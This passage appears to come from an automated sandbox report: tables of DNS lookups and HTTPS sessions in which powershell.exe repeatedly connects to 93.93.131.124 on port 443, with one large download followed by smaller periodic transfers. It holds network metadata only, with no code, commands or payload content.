| Dec 4, 2022 12:14:11.451714039 CET | 192.168.2.3 | 8.8.8.8 | 0x1200 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
| Dec 4, 2022 12:14:52.032318115 CET | 192.168.2.3 | 8.8.8.8 | 0x6624 | Standard query (0) | A (IP address) | IN (0x0001) | false |
| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Dec 4, 2022 12:05:56.927194118 CET | 8.8.8.8 | 192.168.2.3 | 0x9313 | No error (0) | 93.93.131.124 | A (IP address) | IN (0x0001) | false | ||
| Dec 4, 2022 12:06:08.514309883 CET | 8.8.8.8 | 192.168.2.3 | 0xe9fe | No error (0) | 93.93.131.124 | A (IP address) | IN (0x0001) | false | ||
| Dec 4, 2022 12:06:12.321561098 CET | 8.8.8.8 | 192.168.2.3 | 0x5a19 | No error (0) | 93.93.131.124 | A (IP address) | IN (0x0001) | false | ||
| Dec 4, 2022 12:06:19.922585011 CET | 8.8.8.8 | 192.168.2.3 | 0xd5c1 | No error (0) | 93.93.131.124 | A (IP address) | IN (0x0001) | false | ||
| Dec 4, 2022 12:06:27.960360050 CET | 8.8.8.8 | 192.168.2.3 | 0x3fcc | No error (0) | 93.93.131.124 | A (IP address) | IN (0x0001) | false | ||
| Dec 4, 2022 12:06:38.456780910 CET | 8.8.8.8 | 192.168.2.3 | 0xe56 | No error (0) | 93.93.131.124 | A (IP address) | IN (0x0001) | false | ||
| Dec 4, 2022 12:06:51.157512903 CET | 8.8.8.8 | 192.168.2.3 | 0x92c5 | No error (0) | 93.93.131.124 | A (IP address) | IN (0x0001) | false | ||
| Dec 4, 2022 12:07:09.062927008 CET | 8.8.8.8 | 192.168.2.3 | 0x9d0a | No error (0) | 93.93.131.124 | A (IP address) | IN (0x0001) | false | ||
| Dec 4, 2022 12:07:25.446450949 CET | 8.8.8.8 | 192.168.2.3 | 0xed79 | No error (0) | 93.93.131.124 | A (IP address) | IN (0x0001) | false | ||
| Dec 4, 2022 12:07:43.102032900 CET | 8.8.8.8 | 192.168.2.3 | 0x3d3 | No error (0) | 93.93.131.124 | A (IP address) | IN (0x0001) | false | ||
| Dec 4, 2022 12:08:01.275760889 CET | 8.8.8.8 | 192.168.2.3 | 0x1ae0 | No error (0) | 93.93.131.124 | A (IP address) | IN (0x0001) | false | ||
| Dec 4, 2022 12:08:20.996439934 CET | 8.8.8.8 | 192.168.2.3 | 0x11d7 | No error (0) | 93.93.131.124 | A (IP address) | IN (0x0001) | false | ||
| Dec 4, 2022 12:08:46.837131977 CET | 8.8.8.8 | 192.168.2.3 | 0xc8c8 | No error (0) | 93.93.131.124 | A (IP address) | IN (0x0001) | false | ||
| Dec 4, 2022 12:09:16.465509892 CET | 8.8.8.8 | 192.168.2.3 | 0x71c9 | No error (0) | 93.93.131.124 | A (IP address) | IN (0x0001) | false | ||
| Dec 4, 2022 12:09:40.251262903 CET | 8.8.8.8 | 192.168.2.3 | 0xb0a3 | No error (0) | 93.93.131.124 | A (IP address) | IN (0x0001) | false | ||
| Dec 4, 2022 12:10:11.498589039 CET | 8.8.8.8 | 192.168.2.3 | 0x6b6a | No error (0) | 93.93.131.124 | A (IP address) | IN (0x0001) | false | ||
| Dec 4, 2022 12:10:38.699805975 CET | 8.8.8.8 | 192.168.2.3 | 0xadbf | No error (0) | 93.93.131.124 | A (IP address) | IN (0x0001) | false | ||
| Dec 4, 2022 12:11:11.293838024 CET | 8.8.8.8 | 192.168.2.3 | 0xdb9a | No error (0) | 93.93.131.124 | A (IP address) | IN (0x0001) | false | ||
| Dec 4, 2022 12:11:46.812508106 CET | 8.8.8.8 | 192.168.2.3 | 0xf6f1 | No error (0) | 93.93.131.124 | A (IP address) | IN (0x0001) | false | ||
| Dec 4, 2022 12:12:23.339870930 CET | 8.8.8.8 | 192.168.2.3 | 0x1022 | No error (0) | 93.93.131.124 | A (IP address) | IN (0x0001) | false | ||
| Dec 4, 2022 12:12:59.725790024 CET | 8.8.8.8 | 192.168.2.3 | 0x82c2 | No error (0) | 93.93.131.124 | A (IP address) | IN (0x0001) | false | ||
| Dec 4, 2022 12:13:34.724473000 CET | 8.8.8.8 | 192.168.2.3 | 0xcea0 | No error (0) | 93.93.131.124 | A (IP address) | IN (0x0001) | false | ||
| Dec 4, 2022 12:14:11.469310045 CET | 8.8.8.8 | 192.168.2.3 | 0x1200 | No error (0) | 93.93.131.124 | A (IP address) | IN (0x0001) | false | ||
| Dec 4, 2022 12:14:52.051832914 CET | 8.8.8.8 | 192.168.2.3 | 0x6624 | No error (0) | 93.93.131.124 | A (IP address) | IN (0x0001) | false |
|
| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 0 | 192.168.2.3 | 49700 | 93.93.131.124 | 443 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| Timestamp | kBytes transferred | Direction | Data |
|---|---|---|---|
| 2022-12-04 11:05:57 UTC | 0 | OUT | |
| 2022-12-04 11:05:57 UTC | 0 | IN | |
| 2022-12-04 11:05:57 UTC | 0 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 1 | 192.168.2.3 | 49701 | 93.93.131.124 | 443 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| Timestamp | kBytes transferred | Direction | Data |
|---|---|---|---|
| 2022-12-04 11:05:57 UTC | 0 | OUT | |
| 2022-12-04 11:05:57 UTC | 0 | IN | |
| 2022-12-04 11:05:57 UTC | 1 | IN | |
| 2022-12-04 11:05:57 UTC | 8 | IN | |
| 2022-12-04 11:05:57 UTC | 16 | IN | |
| 2022-12-04 11:05:57 UTC | 24 | IN | |
| 2022-12-04 11:05:57 UTC | 32 | IN | |
| 2022-12-04 11:05:57 UTC | 40 | IN | |
| 2022-12-04 11:05:57 UTC | 47 | IN | |
| 2022-12-04 11:05:57 UTC | 55 | IN | |
| 2022-12-04 11:05:57 UTC | 63 | IN | |
| 2022-12-04 11:05:57 UTC | 71 | IN | |
| 2022-12-04 11:05:57 UTC | 79 | IN | |
| 2022-12-04 11:05:57 UTC | 86 | IN | |
| 2022-12-04 11:05:57 UTC | 94 | IN | |
| 2022-12-04 11:05:57 UTC | 102 | IN | |
| 2022-12-04 11:05:57 UTC | 110 | IN | |
| 2022-12-04 11:05:57 UTC | 118 | IN | |
| 2022-12-04 11:05:57 UTC | 126 | IN | |
| 2022-12-04 11:05:57 UTC | 133 | IN | |
| 2022-12-04 11:05:57 UTC | 141 | IN | |
| 2022-12-04 11:05:57 UTC | 149 | IN | |
| 2022-12-04 11:05:57 UTC | 157 | IN | |
| 2022-12-04 11:05:57 UTC | 165 | IN | |
| 2022-12-04 11:05:57 UTC | 172 | IN | |
| 2022-12-04 11:05:57 UTC | 180 | IN | |
| 2022-12-04 11:05:57 UTC | 188 | IN | |
| 2022-12-04 11:05:57 UTC | 196 | IN | |
| 2022-12-04 11:05:57 UTC | 204 | IN | |
| 2022-12-04 11:05:57 UTC | 211 | IN | |
| 2022-12-04 11:05:57 UTC | 219 | IN | |
| 2022-12-04 11:05:57 UTC | 227 | IN | |
| 2022-12-04 11:05:57 UTC | 235 | IN | |
| 2022-12-04 11:05:57 UTC | 243 | IN | |
| 2022-12-04 11:05:57 UTC | 251 | IN | |
| 2022-12-04 11:05:57 UTC | 258 | IN | |
| 2022-12-04 11:05:57 UTC | 266 | IN | |
| 2022-12-04 11:05:57 UTC | 274 | IN | |
| 2022-12-04 11:05:57 UTC | 282 | IN | |
| 2022-12-04 11:05:57 UTC | 290 | IN | |
| 2022-12-04 11:05:57 UTC | 297 | IN | |
| 2022-12-04 11:05:57 UTC | 305 | IN | |
| 2022-12-04 11:05:57 UTC | 313 | IN | |
| 2022-12-04 11:05:57 UTC | 321 | IN | |
| 2022-12-04 11:05:57 UTC | 329 | IN | |
| 2022-12-04 11:05:57 UTC | 336 | IN | |
| 2022-12-04 11:05:57 UTC | 344 | IN | |
| 2022-12-04 11:05:57 UTC | 352 | IN | |
| 2022-12-04 11:05:57 UTC | 360 | IN | |
| 2022-12-04 11:05:57 UTC | 368 | IN | |
| 2022-12-04 11:05:57 UTC | 376 | IN | |
| 2022-12-04 11:05:57 UTC | 383 | IN | |
| 2022-12-04 11:05:57 UTC | 391 | IN | |
| 2022-12-04 11:05:57 UTC | 399 | IN | |
| 2022-12-04 11:05:57 UTC | 407 | IN | |
| 2022-12-04 11:05:57 UTC | 415 | IN | |
| 2022-12-04 11:05:57 UTC | 422 | IN | |
| 2022-12-04 11:05:57 UTC | 430 | IN | |
| 2022-12-04 11:05:57 UTC | 438 | IN | |
| 2022-12-04 11:05:57 UTC | 446 | IN | |
| 2022-12-04 11:05:57 UTC | 454 | IN | |
| 2022-12-04 11:05:57 UTC | 461 | IN | |
| 2022-12-04 11:05:57 UTC | 469 | IN | |
| 2022-12-04 11:05:57 UTC | 477 | IN | |
| 2022-12-04 11:05:57 UTC | 485 | IN | |
| 2022-12-04 11:05:57 UTC | 493 | IN | |
| 2022-12-04 11:05:57 UTC | 501 | IN | |
| 2022-12-04 11:05:57 UTC | 508 | IN | |
| 2022-12-04 11:05:57 UTC | 516 | IN | |
| 2022-12-04 11:05:57 UTC | 524 | IN | |
| 2022-12-04 11:05:57 UTC | 532 | IN | |
| 2022-12-04 11:05:57 UTC | 540 | IN | |
| 2022-12-04 11:05:57 UTC | 547 | IN | |
| 2022-12-04 11:05:57 UTC | 555 | IN | |
| 2022-12-04 11:05:57 UTC | 563 | IN | |
| 2022-12-04 11:05:57 UTC | 571 | IN | |
| 2022-12-04 11:05:57 UTC | 579 | IN | |
| 2022-12-04 11:05:57 UTC | 586 | IN | |
| 2022-12-04 11:05:57 UTC | 594 | IN | |
| 2022-12-04 11:05:57 UTC | 602 | IN | |
| 2022-12-04 11:05:57 UTC | 610 | IN | |
| 2022-12-04 11:05:57 UTC | 618 | IN | |
| 2022-12-04 11:05:57 UTC | 626 | IN | |
| 2022-12-04 11:05:57 UTC | 633 | IN | |
| 2022-12-04 11:05:57 UTC | 641 | IN | |
| 2022-12-04 11:05:57 UTC | 649 | IN | |
| 2022-12-04 11:05:57 UTC | 657 | IN | |
| 2022-12-04 11:05:57 UTC | 665 | IN | |
| 2022-12-04 11:05:57 UTC | 672 | IN | |
| 2022-12-04 11:05:57 UTC | 680 | IN | |
| 2022-12-04 11:05:57 UTC | 688 | IN | |
| 2022-12-04 11:05:57 UTC | 696 | IN | |
| 2022-12-04 11:05:57 UTC | 704 | IN | |
| 2022-12-04 11:05:57 UTC | 711 | IN | |
| 2022-12-04 11:05:57 UTC | 719 | IN | |
| 2022-12-04 11:05:57 UTC | 727 | IN | |
| 2022-12-04 11:05:57 UTC | 735 | IN | |
| 2022-12-04 11:05:57 UTC | 743 | IN | |
| 2022-12-04 11:05:57 UTC | 751 | IN | |
| 2022-12-04 11:05:57 UTC | 758 | IN | |
| 2022-12-04 11:05:57 UTC | 766 | IN | |
| 2022-12-04 11:05:57 UTC | 774 | IN | |
| 2022-12-04 11:05:57 UTC | 782 | IN | |
| 2022-12-04 11:05:57 UTC | 790 | IN | |
| 2022-12-04 11:05:57 UTC | 797 | IN | |
| 2022-12-04 11:05:57 UTC | 805 | IN | |
| 2022-12-04 11:05:57 UTC | 813 | IN | |
| 2022-12-04 11:05:57 UTC | 821 | IN | |
| 2022-12-04 11:05:57 UTC | 829 | IN | |
| 2022-12-04 11:05:57 UTC | 836 | IN | |
| 2022-12-04 11:05:57 UTC | 844 | IN | |
| 2022-12-04 11:05:57 UTC | 852 | IN | |
| 2022-12-04 11:05:57 UTC | 860 | IN | |
| 2022-12-04 11:05:57 UTC | 868 | IN | |
| 2022-12-04 11:05:57 UTC | 876 | IN | |
| 2022-12-04 11:05:57 UTC | 883 | IN | |
| 2022-12-04 11:05:57 UTC | 891 | IN | |
| 2022-12-04 11:05:57 UTC | 899 | IN | |
| 2022-12-04 11:05:57 UTC | 907 | IN | |
| 2022-12-04 11:05:57 UTC | 915 | IN | |
| 2022-12-04 11:05:57 UTC | 922 | IN | |
| 2022-12-04 11:05:57 UTC | 930 | IN | |
| 2022-12-04 11:05:57 UTC | 938 | IN | |
| 2022-12-04 11:05:57 UTC | 946 | IN | |
| 2022-12-04 11:05:57 UTC | 954 | IN | |
| 2022-12-04 11:05:57 UTC | 961 | IN | |
| 2022-12-04 11:05:57 UTC | 969 | IN | |
| 2022-12-04 11:05:57 UTC | 977 | IN | |
| 2022-12-04 11:05:57 UTC | 985 | IN | |
| 2022-12-04 11:05:57 UTC | 993 | IN | |
| 2022-12-04 11:05:58 UTC | 1001 | IN | |
| 2022-12-04 11:05:58 UTC | 1008 | IN | |
| 2022-12-04 11:05:58 UTC | 1016 | IN | |
| 2022-12-04 11:05:58 UTC | 1024 | IN | |
| 2022-12-04 11:05:58 UTC | 1032 | IN | |
| 2022-12-04 11:05:58 UTC | 1040 | IN | |
| 2022-12-04 11:05:58 UTC | 1047 | IN | |
| 2022-12-04 11:05:58 UTC | 1055 | IN | |
| 2022-12-04 11:05:58 UTC | 1063 | IN | |
| 2022-12-04 11:05:58 UTC | 1071 | IN | |
| 2022-12-04 11:05:58 UTC | 1079 | IN | |
| 2022-12-04 11:05:58 UTC | 1086 | IN | |
| 2022-12-04 11:05:58 UTC | 1094 | IN | |
| 2022-12-04 11:05:58 UTC | 1102 | IN | |
| 2022-12-04 11:05:58 UTC | 1110 | IN | |
| 2022-12-04 11:05:58 UTC | 1118 | IN | |
| 2022-12-04 11:05:58 UTC | 1126 | IN | |
| 2022-12-04 11:05:58 UTC | 1133 | IN | |
| 2022-12-04 11:05:58 UTC | 1141 | IN | |
| 2022-12-04 11:05:58 UTC | 1149 | IN | |
| 2022-12-04 11:05:58 UTC | 1157 | IN | |
| 2022-12-04 11:05:58 UTC | 1165 | IN | |
| 2022-12-04 11:05:58 UTC | 1172 | IN | |
| 2022-12-04 11:05:58 UTC | 1180 | IN | |
| 2022-12-04 11:05:58 UTC | 1188 | IN | |
| 2022-12-04 11:05:58 UTC | 1196 | IN | |
| 2022-12-04 11:05:58 UTC | 1204 | IN | |
| 2022-12-04 11:05:58 UTC | 1211 | IN | |
| 2022-12-04 11:05:58 UTC | 1219 | IN | |
| 2022-12-04 11:05:58 UTC | 1227 | IN | |
| 2022-12-04 11:05:58 UTC | 1235 | IN | |
| 2022-12-04 11:05:58 UTC | 1243 | IN | |
| 2022-12-04 11:05:58 UTC | 1251 | IN | |
| 2022-12-04 11:05:58 UTC | 1258 | IN | |
| 2022-12-04 11:05:58 UTC | 1266 | IN | |
| 2022-12-04 11:05:58 UTC | 1274 | IN | |
| 2022-12-04 11:05:58 UTC | 1282 | IN | |
| 2022-12-04 11:05:58 UTC | 1290 | IN | |
| 2022-12-04 11:05:58 UTC | 1297 | IN | |
| 2022-12-04 11:05:58 UTC | 1305 | IN | |
| 2022-12-04 11:05:58 UTC | 1313 | IN | |
| 2022-12-04 11:05:58 UTC | 1321 | IN | |
| 2022-12-04 11:05:58 UTC | 1329 | IN | |
| 2022-12-04 11:05:58 UTC | 1336 | IN | |
| 2022-12-04 11:05:58 UTC | 1344 | IN | |
| 2022-12-04 11:05:58 UTC | 1352 | IN | |
| 2022-12-04 11:05:58 UTC | 1360 | IN | |
| 2022-12-04 11:05:58 UTC | 1368 | IN | |
| 2022-12-04 11:05:58 UTC | 1376 | IN | |
| 2022-12-04 11:05:58 UTC | 1383 | IN | |
| 2022-12-04 11:05:58 UTC | 1391 | IN | |
| 2022-12-04 11:05:58 UTC | 1399 | IN | |
| 2022-12-04 11:05:58 UTC | 1407 | IN | |
| 2022-12-04 11:05:58 UTC | 1415 | IN | |
| 2022-12-04 11:05:58 UTC | 1422 | IN | |
| 2022-12-04 11:05:58 UTC | 1430 | IN | |
| 2022-12-04 11:05:58 UTC | 1438 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 10 | 192.168.2.3 | 49710 | 93.93.131.124 | 443 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| Timestamp | kBytes transferred | Direction | Data |
|---|---|---|---|
| 2022-12-04 11:06:38 UTC | 1479 | OUT | |
| 2022-12-04 11:06:38 UTC | 1479 | IN | |
| 2022-12-04 11:06:38 UTC | 1479 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 11 | 192.168.2.3 | 49711 | 93.93.131.124 | 443 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| Timestamp | kBytes transferred | Direction | Data |
|---|---|---|---|
| 2022-12-04 11:06:39 UTC | 1480 | OUT | |
| 2022-12-04 11:06:39 UTC | 1480 | IN | |
| 2022-12-04 11:06:39 UTC | 1480 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 12 | 192.168.2.3 | 49712 | 93.93.131.124 | 443 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| Timestamp | kBytes transferred | Direction | Data |
|---|---|---|---|
| 2022-12-04 11:06:51 UTC | 1488 | OUT | |
| 2022-12-04 11:06:51 UTC | 1488 | IN | |
| 2022-12-04 11:06:51 UTC | 1488 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 13 | 192.168.2.3 | 49713 | 93.93.131.124 | 443 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| Timestamp | kBytes transferred | Direction | Data |
|---|---|---|---|
| 2022-12-04 11:06:51 UTC | 1488 | OUT | |
| 2022-12-04 11:06:51 UTC | 1489 | IN | |
| 2022-12-04 11:06:51 UTC | 1489 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 14 | 192.168.2.3 | 49714 | 93.93.131.124 | 443 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| Timestamp | kBytes transferred | Direction | Data |
|---|---|---|---|
| 2022-12-04 11:07:09 UTC | 1497 | OUT | |
| 2022-12-04 11:07:09 UTC | 1497 | IN | |
| 2022-12-04 11:07:09 UTC | 1497 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 15 | 192.168.2.3 | 49715 | 93.93.131.124 | 443 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| Timestamp | kBytes transferred | Direction | Data |
|---|---|---|---|
| 2022-12-04 11:07:09 UTC | 1497 | OUT | |
| 2022-12-04 11:07:09 UTC | 1497 | IN | |
| 2022-12-04 11:07:09 UTC | 1498 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 16 | 192.168.2.3 | 49716 | 93.93.131.124 | 443 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| Timestamp | kBytes transferred | Direction | Data |
|---|---|---|---|
| 2022-12-04 11:07:25 UTC | 1505 | OUT | |
| 2022-12-04 11:07:25 UTC | 1506 | IN | |
| 2022-12-04 11:07:25 UTC | 1506 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 17 | 192.168.2.3 | 49717 | 93.93.131.124 | 443 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| Timestamp | kBytes transferred | Direction | Data |
|---|---|---|---|
| 2022-12-04 11:07:25 UTC | 1506 | OUT | |
| 2022-12-04 11:07:25 UTC | 1506 | IN | |
| 2022-12-04 11:07:25 UTC | 1507 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 18 | 192.168.2.3 | 49718 | 93.93.131.124 | 443 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| Timestamp | kBytes transferred | Direction | Data |
|---|---|---|---|
| 2022-12-04 11:07:43 UTC | 1514 | OUT | |
| 2022-12-04 11:07:43 UTC | 1514 | IN | |
| 2022-12-04 11:07:43 UTC | 1515 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 19 | 192.168.2.3 | 49719 | 93.93.131.124 | 443 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| Timestamp | kBytes transferred | Direction | Data |
|---|---|---|---|
| 2022-12-04 11:07:43 UTC | 1515 | OUT | |
| 2022-12-04 11:07:43 UTC | 1515 | IN | |
| 2022-12-04 11:07:43 UTC | 1515 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 2 | 192.168.2.3 | 49702 | 93.93.131.124 | 443 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| Timestamp | kBytes transferred | Direction | Data |
|---|---|---|---|
| 2022-12-04 11:06:09 UTC | 1443 | OUT | |
| 2022-12-04 11:06:09 UTC | 1444 | IN | |
| 2022-12-04 11:06:09 UTC | 1444 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 20 | 192.168.2.3 | 49720 | 93.93.131.124 | 443 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| Timestamp | kBytes transferred | Direction | Data |
|---|---|---|---|
| 2022-12-04 11:08:01 UTC | 1523 | OUT | |
| 2022-12-04 11:08:01 UTC | 1523 | IN | |
| 2022-12-04 11:08:01 UTC | 1524 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 21 | 192.168.2.3 | 49721 | 93.93.131.124 | 443 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| Timestamp | kBytes transferred | Direction | Data |
|---|---|---|---|
| 2022-12-04 11:08:01 UTC | 1524 | OUT | |
| 2022-12-04 11:08:01 UTC | 1524 | IN | |
| 2022-12-04 11:08:01 UTC | 1524 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 22 | 192.168.2.3 | 49722 | 93.93.131.124 | 443 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| Timestamp | kBytes transferred | Direction | Data |
|---|---|---|---|
| 2022-12-04 11:08:21 UTC | 1532 | OUT | |
| 2022-12-04 11:08:21 UTC | 1532 | IN | |
| 2022-12-04 11:08:21 UTC | 1532 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 23 | 192.168.2.3 | 49723 | 93.93.131.124 | 443 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| Timestamp | kBytes transferred | Direction | Data |
|---|---|---|---|
| 2022-12-04 11:08:21 UTC | 1533 | OUT | |
| 2022-12-04 11:08:21 UTC | 1533 | IN | |
| 2022-12-04 11:08:21 UTC | 1533 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 24 | 192.168.2.3 | 49724 | 93.93.131.124 | 443 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| Timestamp | kBytes transferred | Direction | Data |
|---|---|---|---|
| 2022-12-04 11:08:47 UTC | 1541 | OUT | |
| 2022-12-04 11:08:47 UTC | 1541 | IN | |
| 2022-12-04 11:08:47 UTC | 1541 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 25 | 192.168.2.3 | 49725 | 93.93.131.124 | 443 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| Timestamp | kBytes transferred | Direction | Data |
|---|---|---|---|
| 2022-12-04 11:08:47 UTC | 1542 | OUT | |
| 2022-12-04 11:08:47 UTC | 1542 | IN | |
| 2022-12-04 11:08:47 UTC | 1542 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 26 | 192.168.2.3 | 49726 | 93.93.131.124 | 443 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| Timestamp | kBytes transferred | Direction | Data |
|---|---|---|---|
| 2022-12-04 11:09:16 UTC | 1550 | OUT | |
| 2022-12-04 11:09:16 UTC | 1550 | IN | |
| 2022-12-04 11:09:16 UTC | 1550 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 27 | 192.168.2.3 | 49727 | 93.93.131.124 | 443 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| Timestamp | kBytes transferred | Direction | Data |
|---|---|---|---|
| 2022-12-04 11:09:16 UTC | 1550 | OUT | |
| 2022-12-04 11:09:16 UTC | 1551 | IN | |
| 2022-12-04 11:09:16 UTC | 1551 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 28 | 192.168.2.3 | 49728 | 93.93.131.124 | 443 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| Timestamp | kBytes transferred | Direction | Data |
|---|---|---|---|
| 2022-12-04 11:09:40 UTC | 1559 | OUT | |
| 2022-12-04 11:09:40 UTC | 1559 | IN | |
| 2022-12-04 11:09:40 UTC | 1559 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 29 | 192.168.2.3 | 49729 | 93.93.131.124 | 443 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| Timestamp | kBytes transferred | Direction | Data |
|---|---|---|---|
| 2022-12-04 11:09:40 UTC | 1559 | OUT | |
| 2022-12-04 11:09:40 UTC | 1559 | IN | |
| 2022-12-04 11:09:40 UTC | 1560 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 3 | 192.168.2.3 | 49703 | 93.93.131.124 | 443 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| Timestamp | kBytes transferred | Direction | Data |
|---|---|---|---|
| 2022-12-04 11:06:09 UTC | 1444 | OUT | |
| 2022-12-04 11:06:09 UTC | 1444 | IN | |
| 2022-12-04 11:06:09 UTC | 1445 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 30 | 192.168.2.3 | 49730 | 93.93.131.124 | 443 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| Timestamp | kBytes transferred | Direction | Data |
|---|---|---|---|
| 2022-12-04 11:10:11 UTC | 1567 | OUT | |
| 2022-12-04 11:10:11 UTC | 1568 | IN | |
| 2022-12-04 11:10:11 UTC | 1568 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 31 | 192.168.2.3 | 49731 | 93.93.131.124 | 443 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| Timestamp | kBytes transferred | Direction | Data |
|---|---|---|---|
| 2022-12-04 11:10:11 UTC | 1568 | OUT | |
| 2022-12-04 11:10:11 UTC | 1568 | IN | |
| 2022-12-04 11:10:11 UTC | 1569 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 32 | 192.168.2.3 | 49732 | 93.93.131.124 | 443 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| Timestamp | kBytes transferred | Direction | Data |
|---|---|---|---|
| 2022-12-04 11:10:38 UTC | 1576 | OUT | |
| 2022-12-04 11:10:38 UTC | 1577 | IN | |
| 2022-12-04 11:10:38 UTC | 1577 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 33 | 192.168.2.3 | 49733 | 93.93.131.124 | 443 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| Timestamp | kBytes transferred | Direction | Data |
|---|---|---|---|
| 2022-12-04 11:10:39 UTC | 1577 | OUT | |
| 2022-12-04 11:10:39 UTC | 1577 | IN | |
| 2022-12-04 11:10:39 UTC | 1577 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 34 | 192.168.2.3 | 49738 | 93.93.131.124 | 443 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| Timestamp | kBytes transferred | Direction | Data |
|---|---|---|---|
| 2022-12-04 11:11:11 UTC | 1585 | OUT | |
| 2022-12-04 11:11:11 UTC | 1585 | IN | |
| 2022-12-04 11:11:11 UTC | 1586 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 35 | 192.168.2.3 | 49739 | 93.93.131.124 | 443 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| Timestamp | kBytes transferred | Direction | Data |
|---|---|---|---|
| 2022-12-04 11:11:11 UTC | 1586 | OUT | |
| 2022-12-04 11:11:11 UTC | 1586 | IN | |
| 2022-12-04 11:11:11 UTC | 1586 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 36 | 192.168.2.3 | 49750 | 93.93.131.124 | 443 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| Timestamp | kBytes transferred | Direction | Data |
|---|---|---|---|
| 2022-12-04 11:11:47 UTC | 1594 | OUT | |
| 2022-12-04 11:11:47 UTC | 1594 | IN | |
| 2022-12-04 11:11:47 UTC | 1594 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
